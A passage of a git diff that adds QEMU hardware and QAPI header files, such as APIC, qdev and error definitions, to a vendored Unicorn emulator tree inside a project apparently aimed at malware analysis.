WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/> + */ +#ifndef QEMU_APIC_INTERNAL_H +#define QEMU_APIC_INTERNAL_H + +#include "exec/memory.h" +#include "hw/cpu/icc_bus.h" +#include "qemu/timer.h" + +/* APIC Local Vector Table */ +#define APIC_LVT_TIMER 0 +#define APIC_LVT_THERMAL 1 +#define APIC_LVT_PERFORM 2 +#define APIC_LVT_LINT0 3 +#define APIC_LVT_LINT1 4 +#define APIC_LVT_ERROR 5 +#define APIC_LVT_NB 6 + +/* APIC delivery modes */ +#define APIC_DM_FIXED 0 +#define APIC_DM_LOWPRI 1 +#define APIC_DM_SMI 2 +#define APIC_DM_NMI 4 +#define APIC_DM_INIT 5 +#define APIC_DM_SIPI 6 +#define APIC_DM_EXTINT 7 + +/* APIC destination mode */ +#define APIC_DESTMODE_FLAT 0xf +#define APIC_DESTMODE_CLUSTER 1 + +#define APIC_TRIGGER_EDGE 0 +#define APIC_TRIGGER_LEVEL 1 + +#define APIC_LVT_TIMER_PERIODIC (1<<17) +#define APIC_LVT_MASKED (1<<16) +#define APIC_LVT_LEVEL_TRIGGER (1<<15) +#define APIC_LVT_REMOTE_IRR (1<<14) +#define APIC_INPUT_POLARITY (1<<13) +#define APIC_SEND_PENDING (1<<12) + +#define ESR_ILLEGAL_ADDRESS (1 << 7) + +#define APIC_SV_DIRECTED_IO (1<<12) +#define APIC_SV_ENABLE (1<<8) + +#define VAPIC_ENABLE_BIT 0 +#define VAPIC_ENABLE_MASK (1 << VAPIC_ENABLE_BIT) + +#define MAX_APICS 255 + +typedef struct APICCommonState APICCommonState; + +#define TYPE_APIC_COMMON "apic-common" +#define APIC_COMMON(uc, obj) \ + OBJECT_CHECK(uc, APICCommonState, (obj), TYPE_APIC_COMMON) +#define APIC_COMMON_CLASS(uc, klass) \ + OBJECT_CLASS_CHECK(uc, APICCommonClass, (klass), TYPE_APIC_COMMON) +#define APIC_COMMON_GET_CLASS(uc, obj) \ + OBJECT_GET_CLASS(uc, APICCommonClass, (obj), TYPE_APIC_COMMON) + +typedef struct APICCommonClass +{ + ICCDeviceClass parent_class; + + DeviceRealize realize; + void (*set_base)(APICCommonState *s, uint64_t val); + void (*set_tpr)(APICCommonState *s, uint8_t val); + uint8_t (*get_tpr)(APICCommonState *s); + void (*enable_tpr_reporting)(APICCommonState *s, bool enable); + void (*vapic_base_update)(APICCommonState *s); + void (*external_nmi)(APICCommonState *s); + void (*pre_save)(APICCommonState *s); + void (*post_load)(APICCommonState *s); + void (*reset)(APICCommonState *s); +} APICCommonClass; + +struct APICCommonState { + ICCDevice busdev; + + MemoryRegion io_memory; + X86CPU *cpu; + uint32_t apicbase; + uint8_t id; + uint8_t version; + uint8_t arb_id; + uint8_t tpr; + uint32_t spurious_vec; + uint8_t log_dest; + uint8_t dest_mode; + uint32_t isr[8]; /* in service register */ + uint32_t tmr[8]; /* trigger mode register */ + uint32_t irr[8]; /* interrupt request register */ + uint32_t lvt[APIC_LVT_NB]; + uint32_t esr; /* error register */ + uint32_t icr[2]; + + uint32_t divide_conf; + int count_shift; + uint32_t initial_count; + int64_t initial_count_load_time; + int64_t next_time; + int idx; + QEMUTimer *timer; + int64_t timer_expiry; + int sipi_vector; + int wait_for_sipi; + + uint32_t vapic_control; + DeviceState *vapic; + hwaddr vapic_paddr; /* note: persistence via kvmvapic */ +}; + +QEMU_PACK( typedef struct VAPICState { + uint8_t tpr; + uint8_t isr; + uint8_t zero; + uint8_t irr; + uint8_t enabled; +}) VAPICState; + +extern bool apic_report_tpr_access; + +bool apic_next_timer(APICCommonState *s, int64_t current_time); +void apic_enable_vapic(struct uc_struct *uc, DeviceState *d, hwaddr paddr); + +void vapic_report_tpr_access(DeviceState *dev, CPUState *cpu, target_ulong ip, + TPRAccess access); + +#endif /* !QEMU_APIC_INTERNAL_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/i386/pc.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/i386/pc.h new file mode 100644 index 0000000..c149ed7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/i386/pc.h @@ -0,0 +1,52 @@ +#ifndef HW_PC_H +#define HW_PC_H + +#include "hw/boards.h" + +/** + * PCMachineState: + */ +struct PCMachineState { + /*< private >*/ + MachineState parent_obj; + + uint64_t max_ram_below_4g; +}; + +#define PC_MACHINE_MAX_RAM_BELOW_4G "max-ram-below-4g" + +/** + * PCMachineClass: + */ +struct PCMachineClass { + /*< private >*/ + MachineClass parent_class; +}; + +typedef struct PCMachineState PCMachineState; +typedef struct PCMachineClass PCMachineClass; + +#define TYPE_PC_MACHINE "generic-pc-machine" +#define PC_MACHINE(uc, obj) \ + OBJECT_CHECK(uc, PCMachineState, (obj), TYPE_PC_MACHINE) +#define PC_MACHINE_GET_CLASS(obj) \ + OBJECT_GET_CLASS(PCMachineClass, (obj), TYPE_PC_MACHINE) +#define PC_MACHINE_CLASS(klass) \ + OBJECT_CLASS_CHECK(PCMachineClass, (klass), TYPE_PC_MACHINE) + +int pc_cpus_init(struct uc_struct *uc, const char *cpu_model); + +FWCfgState *pc_memory_init(MachineState *machine, + MemoryRegion *system_memory, + ram_addr_t begin, + MemoryRegion **ram_memory); +typedef void (*cpu_set_smm_t)(int smm, void *arg); +void cpu_smm_register(cpu_set_smm_t callback, void *arg); + +void pc_machine_register_types(struct uc_struct *uc); +void x86_cpu_register_types(struct uc_struct *uc); + +#define PC_DEFAULT_MACHINE_OPTIONS \ + .max_cpus = 255 + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/m68k/m68k.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/m68k/m68k.h new file mode 100644 index 0000000..893da01 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/m68k/m68k.h @@ -0,0 +1,10 @@ +#ifndef HW_M68K_H +#define HW_M68K_H + +#include "uc_priv.h" + +void dummy_m68k_machine_init(struct uc_struct *uc); + +void m68k_cpu_register_types(void *opaque); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/mips/cpudevs.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/mips/cpudevs.h new file mode 100644 index 0000000..ce6b487 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/mips/cpudevs.h @@ -0,0 +1,10 @@ +#ifndef HW_MIPS_CPUDEVS_H +#define HW_MIPS_CPUDEVS_H +/* Definitions for MIPS CPU internal devices. */ + +/* mips_addr.c */ +uint64_t cpu_mips_kseg0_to_phys(void *opaque, uint64_t addr); +uint64_t cpu_mips_phys_to_kseg0(void *opaque, uint64_t addr); +uint64_t cpu_mips_kvm_um_phys_to_kseg0(void *opaque, uint64_t addr); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/mips/mips.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/mips/mips.h new file mode 100644 index 0000000..94a57dd --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/mips/mips.h @@ -0,0 +1,7 @@ +#ifndef HW_MIPS_H +#define HW_MIPS_H + +void mips_machine_init(struct uc_struct *uc); +void mips_cpu_register_types(void *opaque); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/qdev-core.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/qdev-core.h new file mode 100644 index 0000000..9c9b1e3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/qdev-core.h @@ -0,0 +1,353 @@ +#ifndef QDEV_CORE_H +#define QDEV_CORE_H + +#include "qemu/queue.h" +#include "qemu/typedefs.h" +#include "qemu/bitmap.h" +#include "qom/object.h" +#include "qapi/error.h" + +enum { + DEV_NVECTORS_UNSPECIFIED = -1, +}; + +#define TYPE_DEVICE "device" +#define DEVICE(uc, obj) OBJECT_CHECK(uc, DeviceState, (obj), TYPE_DEVICE) +#define DEVICE_CLASS(uc, klass) OBJECT_CLASS_CHECK(uc, DeviceClass, (klass), TYPE_DEVICE) +#define DEVICE_GET_CLASS(uc, obj) OBJECT_GET_CLASS(uc, DeviceClass, (obj), TYPE_DEVICE) + +typedef enum DeviceCategory { + DEVICE_CATEGORY_BRIDGE, + DEVICE_CATEGORY_USB, + DEVICE_CATEGORY_STORAGE, + DEVICE_CATEGORY_NETWORK, + DEVICE_CATEGORY_INPUT, + DEVICE_CATEGORY_DISPLAY, + DEVICE_CATEGORY_SOUND, + DEVICE_CATEGORY_MISC, + DEVICE_CATEGORY_MAX +} DeviceCategory; + +typedef int (*qdev_initfn)(DeviceState *dev); +typedef int (*qdev_event)(DeviceState *dev); +typedef void (*qdev_resetfn)(DeviceState *dev); +typedef int (*DeviceRealize)(struct uc_struct *uc, DeviceState *dev, Error **errp); +typedef void (*DeviceUnrealize)(DeviceState *dev, Error **errp); +typedef void (*BusRealize)(BusState *bus, Error **errp); +typedef void (*BusUnrealize)(BusState *bus, Error **errp); + +struct VMStateDescription; + +/** + * DeviceClass: + * @props: Properties accessing state fields. + * @realize: Callback function invoked when the #DeviceState:realized + * property is changed to %true. The default invokes @init if not %NULL. + * @unrealize: Callback function invoked when the #DeviceState:realized + * property is changed to %false. + * @init: Callback function invoked when the #DeviceState::realized property + * is changed to %true. Deprecated, new types inheriting directly from + * TYPE_DEVICE should use @realize instead, new leaf types should consult + * their respective parent type. + * @hotpluggable: indicates if #DeviceClass is hotpluggable, available + * as readonly "hotpluggable" property of #DeviceState instance + * + * # Realization # + * Devices are constructed in two stages, + * 1) object instantiation via object_initialize() and + * 2) device realization via #DeviceState:realized property. + * The former may not fail (it might assert or exit), the latter may return + * error information to the caller and must be re-entrant. + * Trivial field initializations should go into #TypeInfo.instance_init. + * Operations depending on @props static properties should go into @realize. + * After successful realization, setting static properties will fail. + * + * As an interim step, the #DeviceState:realized property is set by deprecated + * functions qdev_init() and qdev_init_nofail(). + * In the future, devices will propagate this state change to their children + * and along busses they expose. + * The point in time will be deferred to machine creation, so that values + * set in @realize will not be introspectable beforehand. Therefore devices + * must not create children during @realize; they should initialize them via + * object_initialize() in their own #TypeInfo.instance_init and forward the + * realization events appropriately. + * + * The @init callback is considered private to a particular bus implementation + * (immediate abstract child types of TYPE_DEVICE). Derived leaf types set an + * "init" callback on their parent class instead. + * + * Any type may override the @realize and/or @unrealize callbacks but needs + * to call the parent type's implementation if keeping their functionality + * is desired. Refer to QOM documentation for further discussion and examples. + * + * <note> + * <para> + * If a type derived directly from TYPE_DEVICE implements @realize, it does + * not need to implement @init and therefore does not need to store and call + * #DeviceClass' default @realize callback. + * For other types consult the documentation and implementation of the + * respective parent types. + * </para> + * </note> + */ +typedef struct DeviceClass { + /*< private >*/ + ObjectClass parent_class; + /*< public >*/ + + DECLARE_BITMAP(categories, DEVICE_CATEGORY_MAX); + const char *fw_name; + const char *desc; + Property *props; + + /* + * Shall we hide this device model from -device / device_add? + * All devices should support instantiation with device_add, and + * this flag should not exist. But we're not there, yet. Some + * devices fail to instantiate with cryptic error messages. + * Others instantiate, but don't work. Exposing users to such + * behavior would be cruel; this flag serves to protect them. It + * should never be set without a comment explaining why it is set. + * TODO remove once we're there + */ + bool cannot_instantiate_with_device_add_yet; + bool hotpluggable; + + /* callbacks */ + void (*reset)(struct uc_struct *uc, DeviceState *dev); + DeviceRealize realize; + DeviceUnrealize unrealize; + + /* device state */ + const struct VMStateDescription *vmsd; + + /* Private to qdev / bus. */ + qdev_initfn init; /* TODO remove, once users are converted to realize */ + qdev_event exit; /* TODO remove, once users are converted to unrealize */ + const char *bus_type; +} DeviceClass; + +typedef struct NamedGPIOList NamedGPIOList; + +struct NamedGPIOList { + char *name; + int num_in; + int num_out; + QLIST_ENTRY(NamedGPIOList) node; +}; + +/** + * DeviceState: + * @realized: Indicates whether the device has been fully constructed. + * + * This structure should not be accessed directly. We declare it here + * so that it can be embedded in individual device state structures. + */ +struct DeviceState { + /*< private >*/ + Object parent_obj; + /*< public >*/ + + const char *id; + bool realized; + bool pending_deleted_event; + int hotplugged; + BusState *parent_bus; + QLIST_HEAD(, NamedGPIOList) gpios; + QLIST_HEAD(, BusState) child_bus; + int num_child_bus; + int instance_id_alias; + int alias_required_for_version; +}; + +#define TYPE_BUS "bus" +#define BUS(uc, obj) OBJECT_CHECK(uc, BusState, (obj), TYPE_BUS) +#define BUS_CLASS(klass) OBJECT_CLASS_CHECK(BusClass, (klass), TYPE_BUS) +#define BUS_GET_CLASS(obj) OBJECT_GET_CLASS(BusClass, (obj), TYPE_BUS) + +struct BusClass { + ObjectClass parent_class; + + /* FIXME first arg should be BusState */ + char *(*get_dev_path)(DeviceState *dev); + /* + * This callback is used to create Open Firmware device path in accordance + * with OF spec http://forthworks.com/standards/of1275.pdf. Individual bus + * bindings can be found at http://playground.sun.com/1275/bindings/. + */ + char *(*get_fw_dev_path)(DeviceState *dev); + void (*reset)(BusState *bus); + BusRealize realize; + BusUnrealize unrealize; + + /* maximum devices allowed on the bus, 0: no limit. */ + int max_dev; + /* number of automatically allocated bus ids (e.g. ide.0) */ + int automatic_ids; +}; + +typedef struct BusChild { + DeviceState *child; + int index; + QTAILQ_ENTRY(BusChild) sibling; +} BusChild; + +#define QDEV_HOTPLUG_HANDLER_PROPERTY "hotplug-handler" + +/** + * BusState: + * @hotplug_device: link to a hotplug device associated with bus. + */ +struct BusState { + Object obj; + DeviceState *parent; + const char *name; + int max_index; + bool realized; + QTAILQ_HEAD(ChildrenHead, BusChild) children; + QLIST_ENTRY(BusState) sibling; +}; + +struct Property { + const char *name; + PropertyInfo *info; + int offset; + uint8_t bitnr; + uint8_t qtype; + int64_t defval; + int arrayoffset; + PropertyInfo *arrayinfo; + int arrayfieldsize; +}; + +struct PropertyInfo { + const char *name; + const char *description; + const char **enum_table; + int (*print)(DeviceState *dev, Property *prop, char *dest, size_t len); + ObjectPropertyAccessor *get; + ObjectPropertyAccessor *set; + ObjectPropertyRelease *release; +}; + +/** + * GlobalProperty: + * @user_provided: Set to true if property comes from user-provided config + * (command-line or config file). + * @used: Set to true if property was used when initializing a device. + */ +typedef struct GlobalProperty { + const char *driver; + const char *property; + const char *value; + bool user_provided; + bool used; + QTAILQ_ENTRY(GlobalProperty) next; +} GlobalProperty; + +/*** Board API. This should go away once we have a machine config file. ***/ + +DeviceState *qdev_create(BusState *bus, const char *name); +DeviceState *qdev_try_create(BusState *bus, const char *name); +int qdev_init(DeviceState *dev) QEMU_WARN_UNUSED_RESULT; +void qdev_init_nofail(DeviceState *dev); +void qdev_set_legacy_instance_id(DeviceState *dev, int alias_id, + int required_for_version); +void qdev_unplug(DeviceState *dev, Error **errp); +void qdev_machine_creation_done(void); +bool qdev_machine_modified(void); + +BusState *qdev_get_child_bus(DeviceState *dev, const char *name); + +/*** Device API. ***/ + +/* Register device properties. */ +/* GPIO inputs also double as IRQ sinks. */ +void qdev_pass_gpios(DeviceState *dev, DeviceState *container, + const char *name); + +BusState *qdev_get_parent_bus(DeviceState *dev); + +/*** BUS API. ***/ + +DeviceState *qdev_find_recursive(BusState *bus, const char *id); + +/* Returns 0 to walk children, > 0 to skip walk, < 0 to terminate walk. */ +typedef int (qbus_walkerfn)(BusState *bus, void *opaque); +typedef int (qdev_walkerfn)(DeviceState *dev, void *opaque); + +void qbus_create_inplace(void *bus, size_t size, const char *typename_, + DeviceState *parent, const char *name); +BusState *qbus_create(const char *typename_, DeviceState *parent, const char *name); +/* Returns > 0 if either devfn or busfn skip walk somewhere in cursion, + * < 0 if either devfn or busfn terminate walk somewhere in cursion, + * 0 otherwise. */ +int qbus_walk_children(BusState *bus, + qdev_walkerfn *pre_devfn, qbus_walkerfn *pre_busfn, + qdev_walkerfn *post_devfn, qbus_walkerfn *post_busfn, + void *opaque); +int qdev_walk_children(DeviceState *dev, + qdev_walkerfn *pre_devfn, qbus_walkerfn *pre_busfn, + qdev_walkerfn *post_devfn, qbus_walkerfn *post_busfn, + void *opaque); + +void qdev_reset_all(DeviceState *dev); + +/** + * @qbus_reset_all: + * @bus: Bus to be reset. + * + * Reset @bus and perform a bus-level ("hard") reset of all devices connected + * to it, including recursive processing of all buses below @bus itself. A + * hard reset means that qbus_reset_all will reset all state of the device. + * For PCI devices, for example, this will include the base address registers + * or configuration space. + */ +void qbus_reset_all(BusState *bus); +void qbus_reset_all_fn(void *opaque); + +/* This should go away once we get rid of the NULL bus hack */ +BusState *sysbus_get_default(void); + +char *qdev_get_fw_dev_path(DeviceState *dev); + +/** + * @qdev_machine_init + * + * Initialize platform devices before machine init. This is a hack until full + * support for composition is added. + */ +void qdev_machine_init(void); + +/** + * @device_reset + * + * Reset a single device (by calling the reset method). + */ +void device_reset(DeviceState *dev); + +const struct VMStateDescription *qdev_get_vmsd(DeviceState *dev); + +const char *qdev_fw_name(DeviceState *dev); + +Object *qdev_get_machine(struct uc_struct *); + +/* FIXME: make this a link<> */ +void qdev_set_parent_bus(DeviceState *dev, BusState *bus); + +extern int qdev_hotplug; + +char *qdev_get_dev_path(DeviceState *dev); + +GSList *qdev_build_hotpluggable_device_list(Object *peripheral); + +void qbus_set_hotplug_handler(BusState *bus, DeviceState *handler, + Error **errp); + +void qbus_set_bus_hotplug_handler(BusState *bus, Error **errp); + +void qdev_register_types(struct uc_struct *uc); + +void sysbus_register_types(struct uc_struct *uc); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/qdev.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/qdev.h new file mode 100644 index 0000000..85313af --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/qdev.h @@ -0,0 +1,7 @@ +#ifndef QDEV_H +#define QDEV_H + +#include "hw/hw.h" +#include "hw/qdev-core.h" + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/sparc/sparc.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/sparc/sparc.h new file mode 100644 index 0000000..e478911 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/sparc/sparc.h @@ -0,0 +1,8 @@ +#ifndef HW_SPARC_H +#define HW_SPARC_H + +void sparc_cpu_register_types(void *opaque); +void leon3_machine_init(struct uc_struct *uc); +void sun4u_machine_init(struct uc_struct *uc); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/dealloc-visitor.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/dealloc-visitor.h new file mode 100644 index 0000000..cf4c36d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/dealloc-visitor.h @@ -0,0 +1,26 @@ +/* + * Dealloc Visitor + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Michael Roth <mdroth@linux.vnet.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef QAPI_DEALLOC_VISITOR_H +#define QAPI_DEALLOC_VISITOR_H + +#include "qapi/visitor.h" + +typedef struct QapiDeallocVisitor QapiDeallocVisitor; + +QapiDeallocVisitor *qapi_dealloc_visitor_new(void); +void qapi_dealloc_visitor_cleanup(QapiDeallocVisitor *d); + +Visitor *qapi_dealloc_get_visitor(QapiDeallocVisitor *v); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/error.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/error.h new file mode 100644 index 0000000..fc1cec6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/error.h @@ -0,0 +1,88 @@ +/* + * QEMU Error Objects + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2. See + * the COPYING.LIB file in the top-level directory. + */ +#ifndef ERROR_H +#define ERROR_H + +#include "qemu/compiler.h" +#include "qapi-types.h" +#include "unicorn/platform.h" + +/** + * A class representing internal errors within QEMU. An error has a ErrorClass + * code and a human message. + */ +typedef struct Error Error; + +/** + * Set an indirect pointer to an error given a ErrorClass value and a + * printf-style human message. This function is not meant to be used outside + * of QEMU. + */ +void error_set(Error **errp, ErrorClass err_class, const char *fmt, ...) + GCC_FMT_ATTR(3, 4); + +/** + * Set an indirect pointer to an error given a ErrorClass value and a + * printf-style human message, followed by a strerror() string if + * @os_error is not zero. + */ +void error_set_errno(Error **errp, int os_error, ErrorClass err_class, + const char *fmt, ...) GCC_FMT_ATTR(4, 5); + +/** + * Same as error_set(), but sets a generic error + */ +#define error_setg(errp, fmt, ...) \ + error_set(errp, ERROR_CLASS_GENERIC_ERROR, fmt, ## __VA_ARGS__) +#define error_setg_errno(errp, os_error, fmt, ...) \ + error_set_errno(errp, os_error, ERROR_CLASS_GENERIC_ERROR, \ + fmt, ## __VA_ARGS__) + +/** + * Helper for open() errors + */ +void error_setg_file_open(Error **errp, int os_errno, const char *filename); + +/* + * Get the error class of an error object. + */ +ErrorClass error_get_class(const Error *err); + +/** + * Returns an exact copy of the error passed as an argument. + */ +Error *error_copy(const Error *err); + +/** + * Get a human readable representation of an error object. + */ +const char *error_get_pretty(Error *err); + +/** + * Propagate an error to an indirect pointer to an error. This function will + * always transfer ownership of the error reference and handles the case where + * dst_err is NULL correctly. Errors after the first are discarded. + */ +void error_propagate(Error **dst_errp, Error *local_err); + +/** + * Free an error object. + */ +void error_free(Error *err); + +/** + * If passed to error_set and friends, abort(). + */ + +extern Error *error_abort; + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp-input-visitor.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp-input-visitor.h new file mode 100644 index 0000000..3ed499c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp-input-visitor.h @@ -0,0 +1,29 @@ +/* + * Input Visitor + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef QMP_INPUT_VISITOR_H +#define QMP_INPUT_VISITOR_H + +#include "qapi/visitor.h" +#include "qapi/qmp/qobject.h" + +typedef struct QmpInputVisitor QmpInputVisitor; + +QmpInputVisitor *qmp_input_visitor_new(QObject *obj); +QmpInputVisitor *qmp_input_visitor_new_strict(QObject *obj); + +void qmp_input_visitor_cleanup(QmpInputVisitor *v); + +Visitor *qmp_input_get_visitor(QmpInputVisitor *v); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp-output-visitor.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp-output-visitor.h new file mode 100644 index 0000000..2266770 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp-output-visitor.h @@ -0,0 +1,28 @@ +/* + * Output Visitor + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef QMP_OUTPUT_VISITOR_H +#define QMP_OUTPUT_VISITOR_H + +#include "qapi/visitor.h" +#include "qapi/qmp/qobject.h" + +typedef struct QmpOutputVisitor QmpOutputVisitor; + +QmpOutputVisitor *qmp_output_visitor_new(void); +void qmp_output_visitor_cleanup(QmpOutputVisitor *v); + +QObject *qmp_output_get_qobject(QmpOutputVisitor *v); +Visitor *qmp_output_get_visitor(QmpOutputVisitor *v); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qbool.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qbool.h new file mode 100644 index 0000000..5304dc5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qbool.h @@ -0,0 +1,29 @@ +/* + * QBool Module + * + * Copyright IBM, Corp. 2009 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef QBOOL_H +#define QBOOL_H + +#include "unicorn/platform.h" +#include "qapi/qmp/qobject.h" + +typedef struct QBool { + QObject_HEAD; + int value; +} QBool; + +QBool *qbool_from_int(int value); +int qbool_get_int(const QBool *qb); +QBool *qobject_to_qbool(const QObject *obj); + +#endif /* QBOOL_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qdict.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qdict.h new file mode 100644 index 0000000..567c02f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qdict.h @@ -0,0 +1,75 @@ +/* + * QDict Module + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino <lcapitulino@redhat.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + */ + +#ifndef QDICT_H +#define QDICT_H + +#include "qapi/qmp/qobject.h" +#include "qapi/qmp/qlist.h" +#include "qemu/queue.h" +#include "unicorn/platform.h" + +#define QDICT_BUCKET_MAX 512 + +typedef struct QDictEntry { + char *key; + QObject *value; + QLIST_ENTRY(QDictEntry) next; +} QDictEntry; + +typedef struct QDict { + QObject_HEAD; + size_t size; + QLIST_HEAD(,QDictEntry) table[QDICT_BUCKET_MAX]; +} QDict; + +/* Object API */ +QDict *qdict_new(void); +const char *qdict_entry_key(const QDictEntry *entry); +QObject *qdict_entry_value(const QDictEntry *entry); +size_t qdict_size(const QDict *qdict); +void qdict_put_obj(QDict *qdict, const char *key, QObject *value); +void qdict_del(QDict *qdict, const char *key); +int qdict_haskey(const QDict *qdict, const char *key); +QObject *qdict_get(const QDict *qdict, const char *key); +QDict *qobject_to_qdict(const QObject *obj); +void qdict_iter(const QDict *qdict, + void (*iter)(const char *key, QObject *obj, void *opaque), + void *opaque); +const QDictEntry *qdict_first(const QDict *qdict); +const QDictEntry *qdict_next(const QDict *qdict, const QDictEntry *entry); + +/* Helper to qdict_put_obj(), accepts any object */ +#define qdict_put(qdict, key, obj) \ + qdict_put_obj(qdict, key, QOBJECT(obj)) + +/* High level helpers */ +double qdict_get_double(const QDict *qdict, const char *key); +int64_t qdict_get_int(const QDict *qdict, const char *key); +int qdict_get_bool(const QDict *qdict, const char *key); +QList *qdict_get_qlist(const QDict *qdict, const char *key); +QDict *qdict_get_qdict(const QDict *qdict, const char *key); +const char *qdict_get_str(const QDict *qdict, const char *key); +int64_t qdict_get_try_int(const QDict *qdict, const char *key, + int64_t def_value); +int qdict_get_try_bool(const QDict *qdict, const char *key, int def_value); +const char *qdict_get_try_str(const QDict *qdict, const char *key); + +QDict *qdict_clone_shallow(const QDict *src); +void qdict_flatten(QDict *qdict); + +void qdict_extract_subqdict(QDict *src, QDict **dst, const char *start); +void qdict_array_split(QDict *src, QList **dst); + +void qdict_join(QDict *dest, QDict *src, bool overwrite); + +#endif /* QDICT_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qerror.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qerror.h new file mode 100644 index 0000000..ed12abe --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qerror.h @@ -0,0 +1,155 @@ +/* + * QError Module + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino <lcapitulino@redhat.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + */ +#ifndef QERROR_H +#define QERROR_H + +#include "qapi/qmp/qstring.h" +#include "qapi/error.h" +#include "qapi-types.h" +#include <stdarg.h> + +typedef struct QError { + QObject_HEAD; + char *err_msg; + ErrorClass err_class; +} QError; + +QString *qerror_human(const QError *qerror); +void qerror_report(ErrorClass err_class, const char *fmt, ...) GCC_FMT_ATTR(2, 3); +void qerror_report_err(Error *err); + +/* + * QError class list + * Please keep the definitions in alphabetical order. + * Use scripts/check-qerror.sh to check. + */ +#define QERR_BASE_NOT_FOUND \ + ERROR_CLASS_GENERIC_ERROR, "Base '%s' not found" + +#define QERR_BLOCK_JOB_NOT_ACTIVE \ + ERROR_CLASS_DEVICE_NOT_ACTIVE, "No active block job on device '%s'" + +#define QERR_BLOCK_JOB_NOT_READY \ + ERROR_CLASS_GENERIC_ERROR, "The active block job for device '%s' cannot be completed" + +#define QERR_BLOCK_FORMAT_FEATURE_NOT_SUPPORTED \ + ERROR_CLASS_GENERIC_ERROR, "Block format '%s' used by device '%s' does not support feature '%s'" + +#define QERR_BUS_NO_HOTPLUG \ + ERROR_CLASS_GENERIC_ERROR, "Bus '%s' does not support hotplugging" + +#define QERR_BUS_NOT_FOUND \ + ERROR_CLASS_GENERIC_ERROR, "Bus '%s' not found" + +#define QERR_COMMAND_NOT_FOUND \ + ERROR_CLASS_COMMAND_NOT_FOUND, "The command %s has not been found" + +#define QERR_DEVICE_ENCRYPTED \ + ERROR_CLASS_DEVICE_ENCRYPTED, "'%s' (%s) is encrypted" + +#define QERR_DEVICE_HAS_NO_MEDIUM \ + ERROR_CLASS_GENERIC_ERROR, "Device '%s' has no medium" + 